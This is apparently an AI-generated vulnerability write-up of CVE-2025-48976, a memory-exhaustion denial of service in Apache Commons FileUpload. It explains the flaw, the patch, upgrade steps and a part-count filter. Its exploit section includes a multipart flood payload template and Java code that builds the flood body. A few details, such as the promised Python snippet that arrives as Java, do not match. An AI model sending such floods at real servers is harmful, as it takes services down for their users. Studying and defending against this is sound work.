CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.

© 2026 CVEReports. All rights reserved.

Made with love by Amit Schendel & Alon Barad



CVE-2025-48976
CVSS 7.5 · EPSS 0.17%

Death by a Thousand Headers: Inside CVE-2025-48976

Alon Barad
Software Engineer

Jan 23, 2026 · 4 min read

PoC Available

Executive Summary (TL;DR)

Apache Commons FileUpload allowed multipart part headers to be up to 10KB by default. By sending thousands of parts in a single request, an attacker can force the server to allocate massive amounts of memory for headers, leading to an OutOfMemoryError (OOM) and Denial of Service. Fixed in 1.6 and 2.0.0-M4 by dropping the default limit to 512 bytes.

Apache Commons FileUpload, the ubiquitous Java library for handling multipart file uploads, failed to strictly limit the size of headers within individual multipart sections. This allows attackers to exhaust server memory via a 'Cumulative Resource Exhaustion' attack.

The Hook: Plumbing That Leaks

If you are a Java developer, you have used Apache Commons FileUpload. It is the silent workhorse behind multipart/form-data parsing in nearly every major framework—Tomcat, Struts, Spring (historically), and countless enterprise monoliths. It is the plumbing of the Java web world.

But plumbing is only interesting when it explodes. CVE-2025-48976 is exactly that kind of explosion. It isn't a sexy RCE involving deserialization gadget chains; it's a brute-force assault on the logic of how we handle input.

The vulnerability lies in a simple assumption: that a user uploading a file will behave reasonably. The developers assumed that the headers describing a file part (like Content-Disposition or Content-Type) wouldn't be excessively large. They were wrong. And because they were wrong, we can crash the server.

The Flaw: A Matter of Scale

Here is the issue: When you send a multipart request, it's split into 'parts'. Each part has its own set of headers. In affected versions of Commons FileUpload (1.x < 1.6 and 2.x < 2.0.0-M4), the library enforced a limit on these headers, but it was surprisingly generous: 10,240 bytes (10KB) per part.

> [!WARNING]
> 10KB doesn't sound like much, right?

Wrong. That is 10KB per part. The library didn't account for an attacker sending a single HTTP POST request containing 10,000 parts.

Do the math: 10,000 parts * 10KB headers = 100 MB of raw string data. Now add the overhead of Java String objects (which are not memory-efficient), the internal buffering in MultipartStream, and the CPU cycles required to trim, parse, and map those headers. You are suddenly looking at gigabytes of heap allocation for a request that takes seconds to generate. This is Cumulative Resource Exhaustion.
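The back-of-the-envelope math above can be checked in a few lines. The 2x heap multiplier for Java Strings is a rough assumption for illustration, not a measured figure:

```java
public class ExhaustionMath {

    // Raw bytes of header data across all parts of one request.
    static long rawHeaderBytes(long parts, long bytesPerPartHeader) {
        return parts * bytesPerPartHeader;
    }

    public static void main(String[] args) {
        long raw = rawHeaderBytes(10_000, 10_240);          // 10,000 parts at the 10KB cap
        System.out.println(raw / 1_000_000 + " MB raw");    // ~100 MB on the wire
        // Java Strings are UTF-16 plus object headers, so the heap cost is
        // roughly double the raw byte count (assumed 2x here) before
        // MultipartStream's own buffering and parsing overhead are added.
        System.out.println(raw * 2 / 1_000_000 + " MB heap, approximately");
    }
}
```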

The Code: Shrinking the Buffer

The fix is brutal but effective. The maintainers realized that legitimate multipart headers (like Content-Disposition: form-data; name="file"; filename="holiday_photos.jpg") are rarely larger than a tweet. They didn't need a 10KB buffer.

In the patch (Commit b247774...), they introduced a new, stricter configuration partHeaderSizeMax and slashed the default limit drastically.

The Vulnerable Configuration (Implicit):

// Roughly 10KB hardcoded or loosely enforced
public static final int HEADER_PART_SIZE_MAX = 10240;

The Fixed Code (v1.6 / v2.0.0-M4):

// Default slashed to 512 bytes
public static final int DEFAULT_PART_HEADER_SIZE_MAX = 512;
 
// Inside MultipartStream.readHeaders()
if (headersSize > partHeaderSizeMax) {
    throw new FileUploadIOException(
        new SizeLimitExceededException(
            "The header section of a part is too large",
            headersSize,
            partHeaderSizeMax
        )
    );
}

By enforcing a 512-byte limit, they forced the attack cost up significantly. To consume the same amount of memory, an attacker would need to send 20x more parts, likely hitting other limits (like total request size or connection timeouts) before the JVM crashes.
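If you control the parser configuration, it may also be worth pinning these limits explicitly rather than relying on defaults. Here is a minimal sketch against the 1.x Servlet integration, assuming the patch's new partHeaderSizeMax option is exposed as a setPartHeaderSizeMax setter (check your version's Javadoc before relying on it):

```java
import javax.servlet.http.HttpServletRequest;
import org.apache.commons.fileupload.disk.DiskFileItemFactory;
import org.apache.commons.fileupload.servlet.ServletFileUpload;

public class UploadConfig {

    public ServletFileUpload buildUpload() {
        ServletFileUpload upload = new ServletFileUpload(new DiskFileItemFactory());
        // Cap each part's header section (assumed setter name for partHeaderSizeMax).
        upload.setPartHeaderSizeMax(512);
        // Defense in depth: cap the whole request and the number of parts it carries.
        upload.setSizeMax(10 * 1024 * 1024);   // 10 MB total request
        upload.setFileCountMax(100);           // added in 1.5 after CVE-2023-24998
        return upload;
    }
}
```

Stacking sizeMax and fileCountMax alongside the header cap means a flood of parts hits a hard ceiling long before the heap does.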

The Exploit: The Loop of Doom

Exploiting this is trivially easy. You don't need Metasploit; you need a few lines of Python. We essentially want to spam the server with valid boundaries, but stuff the headers of each part with junk until we hit just under that 10KB limit.

Here is what the payload structure looks like:

POST /upload HTTP/1.1
Host: vulnerable-app.com
Content-Type: multipart/form-data; boundary=---------------------------123456789
Content-Length: [Huge]
 
---------------------------123456789
Content-Disposition: form-data; name="part1"
X-Junk-Header: AAAAAAAAAAAAAAAAA... [repeat 10,000 times] ...AAAA
 
[small body content]
---------------------------123456789
Content-Disposition: form-data; name="part2"
X-Junk-Header: AAAAAAAAAAAAAAAAA... [repeat 10,000 times] ...AAAA
 
[small body content]
... [Repeat 50,000 times] ...
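Sketching that generator in Java for consistency with the rest of the post: the part count and junk size below are illustrative, and the snippet only builds the body and reports its size rather than sending anything at a real endpoint:

```java
public class MultipartFlood {
    static final String BOUNDARY = "---------------------------123456789";

    // One part whose header section sits just under the old 10KB default cap.
    static String buildPart(int index, int junkBytes) {
        return "--" + BOUNDARY + "\r\n"
             + "Content-Disposition: form-data; name=\"part" + index + "\"\r\n"
             + "X-Junk-Header: " + "A".repeat(junkBytes) + "\r\n"
             + "\r\n"
             + "x\r\n";                        // tiny body; the headers do the damage
    }

    public static void main(String[] args) {
        StringBuilder body = new StringBuilder();
        for (int i = 0; i < 100; i++) {        // a real attack would use thousands
            body.append(buildPart(i, 10_000));
        }
        body.append("--").append(BOUNDARY).append("--\r\n");
        System.out.println("Payload: " + body.length() + " bytes for 100 parts");
    }
}
```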

When the Java application receives this, readHeaders() allocates a buffer for Part 1. Validates it (it's under 10KB, so it passes). Keeps it in memory. Moves to Part 2. Allocates. Validates. Keeps.

Eventually, the Garbage Collector (GC) enters 'panic mode' (GC thrashing), trying to free up space that is legitimately held by the active request thread. CPU spikes to 100%, and shortly after: java.lang.OutOfMemoryError: Java heap space.

The Fix: Upgrade or Config

This is a mandatory upgrade for anyone exposing file uploads to the internet.

  1. Upgrade: Move to Apache Commons FileUpload 1.6 (for legacy Java 8 projects) or 2.0.0-M4 (Jakarta EE / Modern Java).
  2. Verify Transitive Dependencies: You might not think you are using it, but your dependencies are. Run mvn dependency:tree | grep fileupload.
  3. Tomcat Users: If you are using Tomcat's built-in multipart parsing, update Tomcat. They forked this code and were vulnerable too (fixed in Tomcat 9.0.90+, 10.1.25+, 11.0.0-M21+).

If you absolutely cannot upgrade (why?), you might be able to mitigate this with a WAF rule that blocks requests with an excessive number of Content-Disposition headers or abnormally large Content-Type headers, though this is fragile.
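The core of such a rule is just counting part headers before the expensive parse begins. A simplified stand-in for that check (the regex and the 100-part threshold are illustrative choices, not recommended values):

```java
import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class PartCountGuard {
    private static final Pattern PART_HEADER =
        Pattern.compile("(?i)Content-Disposition:\\s*form-data");

    // Count how many multipart part headers a raw body contains.
    static int countParts(String body) {
        Matcher m = PART_HEADER.matcher(body);
        int n = 0;
        while (m.find()) {
            n++;
        }
        return n;
    }

    // Reject bodies carrying more parts than the configured ceiling.
    static boolean allow(String body, int maxParts) {
        return countParts(body) <= maxParts;
    }

    public static void main(String[] args) {
        String part = "Content-Disposition: form-data; name=\"a\"\r\n";
        System.out.println(allow(part.repeat(3), 100));     // prints true
        System.out.println(allow(part.repeat(5_000), 100)); // prints false
    }
}
```

As noted above, this is fragile: header casing tricks, chunked transfer encoding, and boundary obfuscation can slip past a naive pattern, so treat it as a stopgap, not a fix.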

Official Patches

  • Apache: Apache Commons FileUpload 1.6 Release Notes
  • Apache Tomcat: Apache Tomcat Security Advisory


Technical Appendix

CVSS Score: 7.5 / 10
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Probability: 0.17% (top 61% most exploited)

Affected Systems

  • Apache Commons FileUpload < 1.6
  • Apache Commons FileUpload 2.0.0-M1 to < 2.0.0-M4
  • Apache Tomcat 9.x < 9.0.90
  • Apache Tomcat 10.x < 10.1.25
  • Apache Tomcat 11.x < 11.0.0-M21
  • Applications using Struts 2 (depends on FileUpload)
  • Legacy Spring MVC applications

Affected Versions Detail

| Product | Vendor | Affected Versions | Fixed Version |
| --- | --- | --- | --- |
| Apache Commons FileUpload | Apache Software Foundation | < 1.6 | 1.6 |
| Apache Commons FileUpload | Apache Software Foundation | 2.0.0-M1 - 2.0.0-M3 | 2.0.0-M4 |

| Attribute | Detail |
| --- | --- |
| CWE ID | CWE-770 |
| Attack Vector | Network |
| CVSS | 7.5 (High) |
| Impact | Denial of Service (DoS) |
| EPSS Score | 0.0017 |
| Exploit Status | PoC Available |

MITRE ATT&CK Mapping

  • T1499.003 - Endpoint Denial of Service: Application Exhaustion (Impact)
  • CWE-770 - Allocation of Resources Without Limits or Throttling

Known Exploits & Detection

N/A - The vulnerability relies on standard HTTP protocol abuse; no specific binary exploit is required.

Vulnerability Timeline

  • 2025-06-05 - Fix committed to Apache repository
  • 2025-06-16 - Official CVE disclosure
  • 2025-07-01 - Linux distributions publish advisories

References & Sources

  • [1] Apache Security Announcement
  • [2] CVE-2025-48976 Detail

Related Vulnerabilities

  • CVE-2023-24998
  • CVE-2016-3092

Attack Flow Diagram
